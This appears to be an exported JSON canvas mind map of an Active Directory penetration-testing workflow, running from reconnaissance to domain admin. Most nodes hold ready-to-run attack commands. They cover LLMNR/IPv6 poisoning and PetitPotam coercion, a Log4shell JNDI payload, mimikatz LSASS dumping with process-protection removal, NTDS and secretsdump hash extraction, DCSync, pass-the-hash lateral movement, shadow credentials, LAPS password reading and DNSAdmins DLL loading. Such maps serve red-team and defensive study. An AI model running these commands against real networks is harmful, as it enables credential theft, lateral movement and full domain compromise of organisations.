{"type":"text","text":"```bash\ncrackmapexec ldap <dc_ip> -d <domain> -u <user> -p <password> --module laps\n```","id":"93978e47cd1a0302","x":7202,"y":989,"width":835,"height":50},
{"type":"text","text":"```bloodhound\nMATCH p=(g:Group)-[:ReadLAPSPassword]->(c:Computer) RETURN p\n```","id":"9d5d5e1194f5d6ef","x":7470,"y":692,"width":567,"height":60},
{"type":"text","text":"```powershell\nforeach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where{$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}\n```","id":"bcfec516647ac18b","x":7205,"y":852,"width":832,"height":111},
{"type":"text","text":"```cmd\nGet-LAPSPasswords-DomainController <ip_dc> -Credential <domain>\\<login> | Format-Table -AutoSize\n```","id":"99638d194530b526","x":7202,"y":771,"width":835,"height":60},
{"type":"text","text":"Shadow credentials","id":"bfe1e8b701ace933","x":7851,"y":-43,"width":186,"height":50,"color":"#001eff"},
{"type":"text","text":"RBCD","id":"4eab57883025e3e2","x":7851,"y":-148,"width":250,"height":60,"color":"#0fd7a5"},
{"type":"text","text":"```bash\nldeep ldap -u <user> -p <pwd> -d <domain> -s ldap://<dc> add_to_group \"CN=<user>,DC=<domain>\" \"CN=<group>,DC=<domain>\"\n```","id":"00a93f7a6658899f","x":7907,"y":-471,"width":388,"height":139},
{"type":"text","text":"```powershell\nazuread_decrypt_msol_v2.ps1\n```","id":"a9ad5924645462b1","x":7739,"y":-1825,"width":576,"height":60},
{"type":"text","text":"Add Key Credentials","id":"042ff820e2c81631","x":7465,"y":-43,"width":231,"height":50},
{"type":"text","text":"Add SPN \n(target Kerberoasting)","id":"3ffc8f40ee50abe2","x":7499,"y":132,"width":231,"height":75},
{"type":"text","text":"Change password","id":"6a7920782db4a1ab","x":7499,"y":55,"width":231,"height":50},
{"type":"text","text":"Logon script","id":"91f9299b15765798","x":7499,"y":317,"width":231,"height":50},
{"type":"text","text":"```bash\ncertipy shadow auto '-u <user>@<domain>'-p <password> -account '<target_aacount>'\n```","id":"4835c0e3711a2c90","x":7475,"y":-845,"width":499,"height":60},
{"type":"text","text":"```cmd\nWhisker.exe\n```","id":"d95d2c6ce7f25ebb","x":7475,"y":-920,"width":181,"height":60},
{"type":"text","text":"Result / Go to","id":"44c314669b868176","x":8073,"y":-1057,"width":164,"height":60},
{"type":"text","text":"```impacket\ndacledit.py\n```","id":"42836b3bde5f516a","x":7907,"y":-272,"width":206,"height":50},
{"type":"text","text":"```cmd\nnet group \"<group>\" <myuser> /add/domain\n```","id":"1cf09dcfa1e4b95c","x":7907,"y":-591,"width":388,"height":50},
{"type":"text","text":"```cmd\nnet user <user> <password> /domain\n```","id":"8693e9f004a3e974","x":7464,"y":397,"width":380,"height":50},
{"type":"text","text":"```bash\npywhisker.py\n```","id":"d3d9a7005df393fb","x":7475,"y":-745,"width":201,"height":60},
{"type":"text","text":"```impacket\nowneredit.py\n```","id":"6cfc12d660209956","x":7645,"y":-272,"width":206,"height":50},
{"type":"text","text":"Add Key Credentials","id":"e76104426c2059c9","x":7499,"y":232,"width":231,"height":50},
{"type":"text","text":"ForceChangePassword","id":"da2835100e5744cb","x":7173,"y":397,"width":231,"height":50},
{"type":"text","text":"GenericAll / GenericWrite","id":"50cd8ffb6e7feae1","x":7173,"y":182,"width":231,"height":50},
{"type":"text","text":"```bash\npywhisker.py -d \"FQDN_DOMAIN\" -u \"user1\" -p \"CERTIFICATE_PASSWORD\" --target \"TARGET_SAMNAME\" --action \"list\"\n```","id":"b97bf84fc17f1a69","x":7705,"y":-767,"width":499,"height":103},
{"type":"text","text":"Add group member","id":"a85596ca7bc17628","x":7622,"y":-521,"width":206,"height":50},
{"type":"text","text":"Shadow credentials","id":"6f712662d6a44a96","x":7790,"y":232,"width":186,"height":50,"color":"#001eff"},
{"type":"text","text":"Access","id":"6a9398679c2db8bf","x":7790,"y":317,"width":107,"height":50,"color":"#969292"},
{"type":"text","text":"Lateral move PTT","id":"78d463c35e3506c4","x":8748,"y":-2097,"width":250,"height":50,"color":"#484e7f"},
{"type":"text","text":"Lateral move PTH","id":"01bc67671573991f","x":8748,"y":-2159,"width":250,"height":50,"color":"#484e7f"},
{"type":"text","text":"Service account","id":"7b7b68d692f5bb2a","x":8614,"y":-3257,"width":250,"height":60},
{"type":"text","text":"Lateral move PTH","id":"63583f0cfbabe5c7","x":8791,"y":-3787,"width":250,"height":50,"color":"#484e7f"},
{"type":"text","text":"Lateral move PTC","id":"812917adf0b17d20","x":8748,"y":-2037,"width":250,"height":50,"color":"#484e7f"},
{"type":"text","text":"Result / Go to","id":"154cb251c50baccb","x":8256,"y":-2102,"width":164,"height":60},
{"type":"text","text":"NT hash","id":"13b9e853efc38b46","x":8522,"y":-2159,"width":146,"height":50,"color":"2"},
{"type":"text","text":"ccache","id":"c24e4f3a957cbd4c","x":8522,"y":-2097,"width":146,"height":50},
{"type":"text","text":"pfx","id":"cf7f32390e78cf3f","x":8522,"y":-2037,"width":146,"height":50},
{"type":"text","text":"User with clear text pass","id":"6c4ffa47e9eee6af","x":7907,"y":397,"width":260,"height":50,"color":"#37ff00"},
{"type":"text","text":"```bash\nmssqlclient.py -windows-auth <domain>/<user>:<password>@$ip\n```","id":"bf0b0d71e2265d0d","x":11364,"y":-4755,"width":563,"height":58},
{"type":"text","text":"Result / Go to","id":"22409a42bd78c108","x":7894,"y":-2857,"width":164,"height":60},
{"type":"text","text":"Lateral move\n(clear text pass)","id":"c4e5a3a8f15c2ec9","x":8163,"y":-2837,"width":186,"height":83,"color":"#484e7f"},
{"type":"text","text":"ACL","id":"90d79ba9cd6eff86","x":8234,"y":-2344,"width":186,"height":50,"color":"#001eff"},
{"type":"text","text":"Cached domain logon","id":"86db222ae37dfcfc","x":8614,"y":-3435,"width":250,"height":60},
{"type":"text","text":"Machine account","id":"e932241847342265","x":8614,"y":-3346,"width":250,"height":60},
{"type":"text","text":"User + Pass","id":"9c8151e3680bc4c0","x":8937,"y":-3299,"width":146,"height":50,"color":"#37ff00"},
{"type":"text","text":"Hashes NTLM","id":"2c10e95603af0079","x":8791,"y":-3857,"width":146,"height":50,"color":"2"},
{"type":"text","text":"MsCache 2","id":"9f2ca25473486726","x":8937,"y":-3430,"width":146,"height":50,"color":"2"},
{"type":"text","text":"Result / Go to","id":"c44bace6ceaa4199","x":7993,"y":-2298,"width":164,"height":60},
{"type":"text","text":"```bash\nsecretsdump.py -system SYSTEM -sam SAMLOCAL\n```","id":"2f9680d165e649d1","x":7928,"y":-3817,"width":451,"height":50},
{"type":"text","text":"Result / Go to","id":"e5e7c6d6b25845d1","x":8545,"y":-3822,"width":164,"height":60},
{"type":"text","text":"User + Pass","id":"3191c8e9d0e37f71","x":8234,"y":-2254,"width":186,"height":50,"color":"#37ff00"},
{"type":"text","text":"User + Pass","id":"12815e1edb91426e","x":8163,"y":-2907,"width":186,"height":50,"color":"#37ff00"},
{"type":"text","text":"```cmd\nmimikatz \"privilege::debug\" \"sekurlsa::minidump lsass.dmp\" \"sekurlsa::logonPasswords\" \"exit\"\n```","id":"71c470d712e486a0","x":7539,"y":-4473,"width":475,"height":70},
{"type":"text","text":"```cmd\nmimikatz \"!+\" \"!processprotect /process:lsass.exe /remove\" \"privilege::debug\" \"token::elevate\" \"sekurlsa::logonpasswords\"\"!processprotect /process:lsass\" \"!-\" \n```\n\n//With mimidriver.sys","id":"125e77d4c00e2025","x":7321,"y":-4613,"width":832,"height":110},
{"type":"text","text":"Result / Go to","id":"d72747d7cb35bc3c","x":8108,"y":-4292,"width":164,"height":60},
{"type":"text","text":"User + Pass","id":"6f118864c7314309","x":8377,"y":-4403,"width":146,"height":50,"color":"#37ff00"},
{"type":"text","text":"Hashes NTLM","id":"b754ee69d4ed4b5e","x":8377,"y":-4287,"width":146,"height":50,"color":"2"},
{"type":"text","text":"Lateral move (PTH/PTK)\n(Clear text pass in some cases)","id":"bf855e68052cd589","x":8377,"y":-4190,"width":250,"height":89,"color":"#484e7f"},
{"type":"text","text":"```powershell\ncmd /k tscon <id> /dest-console\n```","id":"e58551763618e1d8","x":7542,"y":-1904,"width":492,"height":60},
{"type":"text","text":"```bash\nmasky -d <domain> -u <user> (-p <password> || -k || -H <hash>) -ca <certificate authority> $ip\n```","id":"ad339b4a6c75c078","x":7317,"y":-2097,"width":846,"height":50},
{"type":"text","text":"```bash\ncrackmapexec smb $ip -u <user> -p <password> -M msol\n```","id":"f485ecfd6de72101","x":7739,"y":-1735,"width":576,"height":60},
{"type":"text","text":"abuse sccm","id":"00bbc68a369de3b7","x":10732,"y":-7163,"width":129,"height":55},
{"type":"text","text":"Find MSSQL access","id":"4766d1829d768b22","x":10746,"y":-6998,"width":205,"height":60},
{"type":"text","text":"```cmd\nCMPivot\n```","id":"c5338b800fec9a77","x":10951,"y":-7246,"width":192,"height":60},
{"type":"text","text":"```cmd\ndnscmd.exe /config /serverlevelplugindll <\\\\path\\to\\dll>\n```\n// Requires a member of the DnsAdmins group","id":"4310d7e95ca260e2","x":7254,"y":1636,"width":531,"height":94},
{"type":"text","text":"DNSadmins abuse\n(CVE-2021-40469)","id":"f5a9188c3895a181","x":6942,"y":1643,"width":262,"height":79,"color":"#7c0404"},
{"type":"text","text":"DcSync","id":"313fd181331b5583","x":8420,"y":-1765,"width":133,"height":60,"color":"#8199cf"},
{"type":"text","text":"Lateral move RDP","id":"7c619f2d200d410e","x":8122,"y":-1899,"width":250,"height":50,"color":"#484e7f"},
{"type":"text","text":"interactive-shell","id":"b757b1f6578a4ea4","x":11061,"y":-5784,"width":193,"height":60},
{"type":"text","text":"Result / Go to","id":"676619b79cfc55fb","x":12011,"y":-5060,"width":164,"height":60},
{"type":"text","text":"```bash\npsexec.py <domain>/<user>:<password>@$ip\n```","id":"d32a2584275683b7","x":11515,"y":-5751,"width":563,"height":58},
{"type":"text","text":"Password","id":"dd9e84f58aa65a2d","x":10529,"y":-5489,"width":124,"height":50},
{"type":"text","text":"Cleartext password","id":"86a3945122ffe31d","x":10717,"y":-5494,"width":193,"height":60},
{"type":"text","text":"Local User","id":"bcaff9e9fcabbd8e","x":10529,"y":-6000,"width":124,"height":50},
{"type":"text","text":"MSSQL","id":"d0b89121392e5a17","x":10529,"y":-6805,"width":105,"height":50,"color":"#484e7f"},
{"type":"text","text":"```bash\nmssqlclient.py -windows-auth <domain>/<user>:<password>@$ip\n```\n(pr # 1397)","id":"d2dbc503a63e102a","x":10746,"y":-6396,"width":563,"height":95},
{"type":"text","text":"Trust link","id":"01a7f9e2c20495a9","x":10746,"y":-6684,"width":205,"height":60},
{"type":"text","text":"```bash\ncertipy auth-pfx <crt_file> -dc-ip <dc_ip><user>@$ip\n```","id":"da9534c1d8f58cf3","x":11307,"y":-1695,"width":517,"height":60},
{"type":"text","text":"```bash\nexport KRB5CCNAME=/root/impacket-examples/domain_ticket.ccache\n```","id":"0c748a95b5e9f2d1","x":11043,"y":-2919,"width":583,"height":60},
{"type":"text","text":"```bash\nproxychains lookupsid.py <domain>/<user>@$ip -no-pass -domain-sids\n```","id":"68840cfdd897b60b","x":10905,"y":-2236,"width":655,"height":60},
{"type":"text","text":"Kerberos","id":"5667e163f4cec8fe","x":10526,"y":-2529,"width":124,"height":50},
{"type":"text","text":"Schannel","id":"ca5159389c68cd68","x":11209,"y":-1308,"width":250,"height":60},
{"type":"text","text":"Lateral move","id":"5dd4da896383237f","x":10047,"y":-4337,"width":250,"height":50,"color":"#484e7f"},
{"type":"text","text":"NTLM hash","id":"f54698defdf00d49","x":10525,"y":-3775,"width":124,"height":50},
{"type":"text","text":"WSUSpect","id":"d559be36feae3d17","x":10529,"y":-7390,"width":148,"height":60},
{"type":"text","text":"Certificate (pfx)","id":"18ba71ade68e1018","x":10540,"y":-1538,"width":166,"height":50},
{"type":"text","text":"Socks (With NTLM relay)","id":"05903d2fa40c9ac7","x":10540,"y":-2072,"width":221,"height":50,"color":"3"},
{"type":"text","text":"```powershell\nWSUSpendu.ps1\n```\n// Need compromised WSUS server","id":"73a52ddf03cdb0c0","x":10732,"y":-7411,"width":411,"height":102},
{"type":"text","text":"sccm admin","id":"aaceabe15cb4cd93","x":10529,"y":-7161,"width":148,"height":50},
{"type":"text","text":"```cmd\nrubeus monitor /interval:5\n```","id":"7bac45286d721dca","x":12024,"y":1840,"width":602,"height":60},
{"type":"text","text":"DcSync","id":"c90d2b1fbd0f3886","x":13193,"y":1843,"width":120,"height":50,"color":"#8199cf"},
{"type":"text","text":"Pass The Ticket","id":"2e546c1170aca574","x":12892,"y":1845,"width":187,"height":50,"color":"#484e7f"},
{"type":"text","text":"Domain Admin","id":"972403b8a80a9034","x":13394,"y":1843,"width":164,"height":50,"color":"1"},
{"type":"text","text":"Get tickets","id":"5e1d489a07e573df","x":11571,"y":1635,"width":250,"height":60},
{"type":"text","text":"```bloodhound\nMATCH (u:User {owned:true}), (c:Computer {unconstraineddelegation:true}), p=shortestPath((u)-[*1..]->(c)) RETURN p\n```","id":"d2f3b330ee4298d8","x":11571,"y":1454,"width":1055,"height":60},
{"type":"text","text":"```mimikatz\nprivilege::debug sekurlsa::ticket /export sekurlsa::tickets /export\n```","id":"99efe18fd67e8e82","x":11907,"y":1543,"width":719,"height":60},
{"type":"text","text":"(Force_connection_with_coerced_auth)","id":"1fee4b9da12fdb94","x":11571,"y":1840,"width":377,"height":60,"color":"3"},
{"type":"text","text":"```cmd\nrubeus dump /service:krbtgt /nowrap\n```","id":"f1921ab556ed9233","x":11907,"y":1635,"width":719,"height":60},
{"type":"text","text":"```cmd\nrubeus dump /luid:0xdeadbeef /nowrap\n```","id":"a6c7adc6c3b718ce","x":11907,"y":1722,"width":719,"height":60},
{"type":"text","text":"Kerberos TGT","id":"3aef9a1f3068e06f","x":12874,"y":1585,"width":142,"height":50,"color":"#484e7f"},
{"type":"text","text":"```bloodhound\nMATCH (c:Computer {unconstraineddelegation:true}) RETURN c\n```","id":"4c7b6e99ea9ebf66","x":11571,"y":1365,"width":582,"height":60},
{"type":"text","text":"```Powershell\nGet-NetComputer -Unconstrained\n```","id":"f71590b1a92f572e","x":11571,"y":1187,"width":453,"height":60},
{"type":"text","text":"```PowerView\nGet-DomainComputer -Unconstrained -Properties DnsHostName\n```","id":"fb65a229e0501b4d","x":11571,"y":1276,"width":582,"height":60},
{"type":"text","text":"Kerberos TGT","id":"4b5778ca72c23738","x":12688,"y":1845,"width":142,"height":50,"color":"#484e7f"},
{"type":"text","text":"```bloodhound\nMATCH (c:Computer), (t:Computer), p=((c)-[:AllowedToDelegate]->(t)) RETURN p\n```","id":"d6be9d4a9bf6f502","x":11571,"y":2144,"width":845,"height":60},
{"type":"text","text":"```PowerView\nGet-DomainComputer -TrustedToAuth -Properties DnsHostName, MSDS-AllowedToDelegateTo\n```","id":"425c87ab5d80738a","x":11571,"y":1960,"width":845,"height":60},
{"type":"text","text":"```PowerView\nGet-DomainUser -TrustedToAuth\n```","id":"f4c52890fde6a259","x":11571,"y":2052,"width":368,"height":60},
{"type":"text","text":"```bash\natexec.py -hashes \":<hash>\"<user>@$ip \"command\"\n```","id":"245bad8ec78f2fc9","x":11364,"y":-4346,"width":563,"height":58},
{"type":"text","text":"```bash\nsmbexec.py -hashes \":<hash>\"<user>@$ip\n```","id":"2859dbe9aa4c6a15","x":11364,"y":-4268,"width":563,"height":58},
{"type":"text","text":"```bash\npsexec.py -hashes \":<hash>\" <user>@$ip\n```","id":"8b16c01a327c2888","x":11364,"y":-4651,"width":563,"height":72},
{"type":"text","text":"```powershell\npsexec.exe -AcceptEULA \\\\<ip>\n```","id":"259f35edcbfa52f9","x":11364,"y":-4555,"width":563,"height":72},
{"type":"text","text":"Pass the Certificate","id":"93adac49c097b6c7","x":10905,"y":-1417,"width":223,"height":60},
{"type":"text","text":"```bash\nproxychains mssqlclient.py -windows-auth <domain>/<user>@$ip -no-pass\n```","id":"aa7c68f3251c5659","x":10905,"y":-2149,"width":655,"height":60},
{"type":"text","text":"```bash\nproxychains secretsdump -no-pass '<domain>'/'<user>'@$ip\n```","id":"de40c9f14cdb0900","x":10905,"y":-2072,"width":655,"height":60},
{"type":"text","text":"```bash\nproxychains atexec.py -no-pass <domain>/<user>@$ip \"command\"\n```","id":"ae6c711c58423f43","x":11197,"y":-1989,"width":599,"height":60},
{"type":"text","text":"pkinit","id":"1a8f05909c496f44","x":11209,"y":-1487,"width":250,"height":60},
{"type":"text","text":"```bash\nproxychains smbexec.py -no-pass <domain>/<user>@$ip\n```","id":"490a88aa3876d257","x":11197,"y":-1913,"width":599,"height":60},
{"type":"text","text":"```bash\ncrackmapexec smb <ip_range> -u <user> -p <password> -d <domain>\n```","id":"a5f2d11b325a4a6d","x":11364,"y":-5269,"width":563,"height":58},
{"type":"text","text":"SMB","id":"ff35485c4e76a7f7","x":11061,"y":-3603,"width":123,"height":60},
{"type":"text","text":"RDP","id":"22d8808e96c432cc","x":11061,"y":-3755,"width":123,"height":60},
{"type":"text","text":"```metasploit\nwindows/gather/credentials/domain_hashdump\n```","id":"a2e7ddb8ae593517","x":10967,"y":-398,"width":477,"height":50},
{"type":"text","text":"Domain Admin","id":"7bbbb1f1f1b64494","x":10348,"y":-304,"width":178,"height":60,"color":"1"},
{"type":"text","text":"dump ntds.dit","id":"655beb3d5aec0d6d","x":10717,"y":-448,"width":143,"height":50},
{"type":"text","text":"```bash\ncrackmapexec smb <dcip> -u <user> -p <password> -d <domain> --ntds\n```","id":"b7606b46a285b27a","x":10967,"y":-543,"width":593,"height":50},
{"type":"text","text":"```bash\nsecretsdump.py '<domain>/<user>:<pass>'@$ip\n```","id":"6012d303158fd87f","x":10967,"y":-473,"width":593,"height":50},
{"type":"text","text":"Credentials","id":"4724b278ed4c389f","x":12681,"y":-164,"width":164,"height":50,"color":"#37ff00"},
{"type":"text","text":"```cmd\nntdsutil \"ac i ntds\" \"ifm\" \"create full c:\\temp\" q q \n```","id":"2d8fead620422c5d","x":10967,"y":-324,"width":477,"height":50},
{"type":"text","text":"```bash\ndpapi.py backupkeys -hashes ':<hash>' -t Administrator@<dc_ip> --export\n```\n// note: dpapi.py != DonPAPI","id":"e4ec6f469ddbddd0","x":10967,"y":-189,"width":658,"height":100},
{"type":"text","text":"```bash\nsecretsdump.py -ntds ntds_file.dit -system SYSTEM_FILE -hashes lmhash:nthash LOCAL -outputfile ntlm-extract\n```","id":"c6d21d06964a687e","x":11505,"y":-324,"width":976,"height":50},
{"type":"text","text":"```bash\nDonPAPI -pvk <domain_backupkey.pvk> -h ':<hash>' <domain>/<user>@<ip_range>\n```","id":"64ee3d82af749d97","x":11681,"y":-164,"width":681,"height":50},
{"type":"text","text":"Result / Go to","id":"0d5d922cbb97dc89","x":11797,"y":-498,"width":164,"height":60},
{"type":"text","text":"Crack hash","id":"371f86648b2eec2a","x":12062,"y":-543,"width":146,"height":50,"color":"2"},
{"type":"text","text":"Lateral move","id":"bae22edd1ff0f905","x":12062,"y":-446,"width":146,"height":60,"color":"#484e7f"},
{"type":"text","text":"Get unconstrained delegation machines","id":"e4f4a04c1d1f6b48","x":11103,"y":1319,"width":333,"height":50},
{"type":"text","text":"Result / Go to","id":"7ef897d4f537bda8","x":12421,"y":-169,"width":164,"height":60},
{"type":"text","text":"Get constrained delegation ","id":"7d6fa83f5c34803a","x":11103,"y":2094,"width":333,"height":50},
{"type":"text","text":"Unconstrained delegation","id":"890b3efaeba88777","x":10756,"y":1540,"width":250,"height":60},
{"type":"text","text":"UAC: ADS_UF_TRUSTED_FOR_DELEGATION","id":"bab3ddbc48446593","x":11103,"y":1732,"width":381,"height":50},
{"type":"text","text":"Enterprise Admin","id":"5d3504501ebf75bb","x":13979,"y":-483,"width":250,"height":60,"color":"#7600ad"},
{"type":"text","text":"```bash\nnmap -Pn -sC -sV -oA $ip.output $ip\n```","id":"5aea1cf60aabd994","x":-1419,"y":-705,"width":499,"height":50},
{"type":"text","text":"```bash\nnmap -Pn --script smb-vuln* -p 139,445 $ip\n```","id":"970caa7ff00527ff","x":-1419,"y":-773,"width":499,"height":50},
{"type":"text","text":"Find vulnerable host","id":"e28615a1a57b8503","x":-799,"y":-773,"width":250,"height":60,"color":"4"},
{"type":"text","text":"```bash\nnmap -Pn -sC -sV -oA -p- $ip.output $ip\n```","id":"2cadfd052197f008","x":-1419,"y":-637,"width":499,"height":50},
{"type":"text","text":"```bash\nARP poisoning\n```","id":"5ffdaedfa603d595","x":-1419,"y":1155,"width":280,"height":62},
{"type":"text","text":"```bash\nsmbmap -u \"\" -p \"\" -P 445 -H <dc-ip> && smbmap -u \"guest\" -p \"\" -P 445 -H <dc-ip>\n```","id":"d70f0e48b88f0c2b","x":-1419,"y":-128,"width":409,"height":60},
{"type":"text","text":"```bash\nenum4linux -a -u \"\" -p \"\" <dc-ip> && enum4linux -a -u \"guest\" -p \"\" <dc-ip>\n```","id":"de65e76747b04d9e","x":-1419,"y":-236,"width":839,"height":81},
{"type":"text","text":"```bash\nnmap -sU -sC -sV -oA $ip.UDP-output $ip\n```","id":"09bbbed589f90ee7","x":-1419,"y":-571,"width":499,"height":50},
{"type":"text","text":"User found","id":"475c8040ecef93ce","x":-517,"y":482,"width":164,"height":60,"color":"#31dbdd"},
{"type":"text","text":"```bash\nnslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>\n```","id":"552dbd3bdd5243b3","x":-1419,"y":-396,"width":560,"height":50},
{"type":"text","text":"```bash\nnmcli dev show eth0\n```","id":"3a42b30472341f68","x":-1419,"y":-475,"width":306,"height":60},
{"type":"text","text":"Coerce","id":"6a7277f50eb06e79","x":-1713,"y":1258,"width":187,"height":60,"color":"5"},
{"type":"text","text":"Unauthenticated PetitPotam\n(CVE-2022-26925)","id":"b5259f511998e728","x":-1404,"y":1258,"width":250,"height":60,"color":"#7c0404"},
{"type":"text","text":"```bash\nPetitPotam.py -d <domain> <listener_ip> <target-ip>\n```","id":"18213f5195f600ba","x":-1090,"y":1258,"width":507,"height":60},
{"type":"text","text":"```bash\nbettercap\n```","id":"5f17da44a3fac888","x":-1081,"y":1158,"width":283,"height":59},
{"type":"text","text":"```bash\nresponder -i eth0 \n```","id":"f95aa1b75c2a67b8","x":-1083,"y":893,"width":285,"height":59},
{"type":"text","text":"```bash\nresponder -i eth0 --lm\n```","id":"545e543172dc6d51","x":-1081,"y":964,"width":283,"height":59},
{"type":"text","text":"```bash\nLLMNR / NBTNS / MDNS\n```","id":"44d7daa03cbf639b","x":-1419,"y":931,"width":280,"height":62},
{"type":"text","text":"List **guest access** on SMB share","id":"8e9ea2e9822ae2b1","x":-1713,"y":-53,"width":187,"height":123,"color":"5"},
{"type":"text","text":"```bash\nIPv6 preferred over IPv4\n```","id":"c4b69d972e7ee1e9","x":-1419,"y":1053,"width":280,"height":62},
{"type":"text","text":"Poisoning SMB -> HTTP ->","id":"ff4e51f72dab03cf","x":-583,"y":1055,"width":164,"height":60,"color":"3"},
{"type":"text","text":"Find user list","id":"bc52dd330dabaa5e","x":-1713,"y":542,"width":187,"height":60,"color":"5"},
{"type":"text","text":"Poisoning","id":"12acd8fe356c1bfc","x":-1713,"y":993,"width":187,"height":60,"color":"5"},
{"type":"text","text":"```bash\nldapsearch -x -H ldap://$ip -s base\n```","id":"0ea07e6ccb96eb5e","x":-1425,"y":323,"width":566,"height":59},
{"type":"text","text":"```bash\nnmap -n -sV --script \"ldap* and not brute\" -p 389 $ip\n```","id":"afad5fb61a5b41c8","x":-1425,"y":204,"width":566,"height":59},
{"type":"text","text":"```bash\nnmap -p 88 --script=krb5-enum-users --script-args=\"krb5-enum-users.realm='<domain>',userdb=<users_list_file>\" $ip\n```","id":"7663efa4fca553c8","x":-1082,"y":651,"width":499,"height":110},
{"type":"text","text":"```bash\nOSINT - enumerate username on internet\n```","id":"ef4d1435f4127e9c","x":-1419,"y":663,"width":280,"height":85},
{"type":"text","text":"```bash\nmitm6 -d <domain>\n```","id":"9b97556bfac9f9d8","x":-1081,"y":1053,"width":283,"height":59},
{"type":"text","text":"```bash\nkerbrute userenum --dc $ip -d $domain /usr/share/wordlists/seclists/Usernames/Names/names.txt\n```","id":"b180dbfb40e13270","x":-1419,"y":780,"width":836,"height":79},
{"type":"text","text":"```bash\nnet rpc group members 'Domain Users' -W '<domain>' -l '<IP>' -U '%'\n```","id":"9c0090a0701fc05a","x":-1419,"y":553,"width":621,"height":74},
{"type":"text","text":"```bash\ncrackmapexec smb $ip -u '' -p ''\n```","id":"19c2801d90c6dac8","x":-1419,"y":40,"width":409,"height":60},
{"type":"text","text":"```bash\nsmbclient -U '%' -L //<dc-ip> && smbclient -U 'guest%' -L //<dc-ip> \n```","id":"303ddccb2f582faa","x":-1419,"y":-44,"width":409,"height":60},
{"type":"text","text":"```bash\ncrackmapexec smb $ip --users\n```","id":"640fde233349daf8","x":-1419,"y":482,"width":409,"height":60},
{"type":"text","text":"User found","id":"e33d5d29466126f4","x":-713,"y":263,"width":164,"height":60,"color":"#31dbdd"},
{"type":"text","text":"```bash\nenum4linux -U <dc-ip> | grep 'user:'\n```","id":"d3eda11a689e3213","x":-1419,"y":411,"width":409,"height":60},
{"type":"text","text":"```bash\nnmap -Pn -sV --top-ports 50 --open $ip\n```","id":"e34cd4be899de1b1","x":-1419,"y":-841,"width":499,"height":50},
{"type":"text","text":"```bash\ndig axfr <domain_name> @<name_server>\n```","id":"7ea9e3211107b13f","x":-1424,"y":-298,"width":565,"height":50},
{"type":"text","text":"DNS Zone transfer","id":"71c17a9669754889","x":-1713,"y":-303,"width":187,"height":60,"color":"5"},
{"type":"text","text":"Scan network","id":"3b3430ebb774c3bc","x":-1713,"y":-778,"width":187,"height":60,"color":"5"},
{"type":"text","text":"```bash\ncrackmapexec smb $ip -u 'a' -p ''\n```","id":"8af125cfcc7ef6d1","x":-1419,"y":124,"width":409,"height":60},
{"type":"text","text":"AD pentesting","id":"d49852cf325e5f86","x":-2382,"y":170,"width":250,"height":60},
{"type":"text","text":"Enumerate LDAP","id":"75b8a1968a27ce2f","x":-1713,"y":263,"width":187,"height":60,"color":"5"},
{"type":"text","text":"```bash\ncrackmapexec smb <IP-range>\n```","id":"e1444e1f11d2ee45","x":-1419,"y":-987,"width":499,"height":50},
{"type":"text","text":"```bash\nnmap -sP -p- $ip\n```","id":"79bd3d2569ff33ff","x":-1419,"y":-919,"width":499,"height":60},
{"type":"text","text":"Admin","id":"7dc30c3b01bcd4aa","x":2783,"y":-1905,"width":162,"height":60,"color":"#ff00ff"},
{"type":"text","text":"Result / Go to","id":"7036cff06a67b690","x":2488,"y":-1833,"width":168,"height":57},
{"type":"text","text":"Domain Admin","id":"ef085fbeb08c5843","x":2783,"y":-1801,"width":162,"height":60,"color":"1"},
{"type":"text","text":"Find DC IP","id":"9f3bade1a260738f","x":-1713,"y":-426,"width":187,"height":60,"color":"5"},
{"type":"text","text":"Coerce SMB ->","id":"0c0ab88c019d8df8","x":-517,"y":1258,"width":164,"height":60,"color":"3"},
{"type":"text","text":"```bash\n${jndi:ldap://<ip>:<port> /o=reference}\n```","id":"de30de850c7520d0","x":676,"y":-759,"width":413,"height":75},
{"type":"text","text":"Log4shell","id":"1c6039eb70b8e8b4","x":387,"y":-752,"width":250,"height":60,"color":"#7c0404"},
{"type":"text","text":"Database credentials","id":"a971808f69b49a66","x":387,"y":-672,"width":250,"height":60},
{"type":"text","text":"rogue Jndi-1.0.jar","id":"1c53e813cb3bcadb","x":1139,"y":-752,"width":167,"height":60},
{"type":"text","text":"```bash\npython3 restorepassword.py -target-ip $ip <DOMAIN>/<MACHINE_BIOS_NAME>@<MACHINE_BIOS_NAME> -hexpass <HEXPASS>\n```","id":"ee728fb87728b669","x":1569,"y":-1778,"width":634,"height":73},
{"type":"text","text":"```metasploit\nexploit/multi/http/tomcat_mgr_deploy\n```","id":"29aa61b7fdc3f8c1","x":714,"y":-1221,"width":381,"height":50},
{"type":"text","text":"Result / Go to","id":"2623972afe90af48","x":1401,"y":-853,"width":168,"height":57},
{"type":"text","text":"Domain Admin","id":"ddd412c0be7f838f","x":1651,"y":-856,"width":250,"height":60},
{"type":"text","text":"MSSQL connection","id":"e9892a03e61b81ca","x":1114,"y":-672,"width":250,"height":60,"color":"#0f0c17"},
{"type":"text","text":"java serialized port","id":"887aa0fd1d482358","x":387,"y":-1072,"width":250,"height":60},
{"type":"text","text":"java rmi","id":"c4991b5a4f896f90","x":387,"y":-1152,"width":250,"height":60},
{"type":"text","text":"```bash\nsearchsploit\n```","id":"74ea42d4f1c3e968","x":683,"y":-992,"width":183,"height":60},
{"type":"text","text":"ysoserial","id":"58df5711b400e917","x":683,"y":-1072,"width":183,"height":60},
{"type":"text","text":"```metasploit\nuse admin/mssql/mssql_enum_sql_logins\n```","id":"b8b25ac74a8ebf26","x":681,"y":-667,"width":381,"height":50},
{"type":"text","text":"Admin","id":"cdfdab792a946d43","x":1651,"y":-927,"width":250,"height":60,"color":"#ff00ff"},
{"type":"text","text":"Proxyshell","id":"da3003709756312e","x":387,"y":-832,"width":250,"height":60,"color":"#7c0404"},
{"type":"text","text":"tomcat/jboss manager","id":"4fb20b49e923c7d0","x":387,"y":-1263,"width":250,"height":60},
{"type":"text","text":"```cmd\nfindstr /S /I cpassword \\\\<FQDN>\\sysvol\\<FQDN>\\policies\\*.xml*\n```","id":"babc665b2228f19f","x":714,"y":-1402,"width":1172,"height":50},
{"type":"text","text":"```metasploit\nauxiliary/scanner/http/tomcat\n```","id":"3c4aade584dca09e","x":714,"y":-1296,"width":381,"height":50},
{"type":"text","text":"Vulnerable product with CVE","id":"3d1eaa1120a48ec0","x":387,"y":-992,"width":250,"height":60},
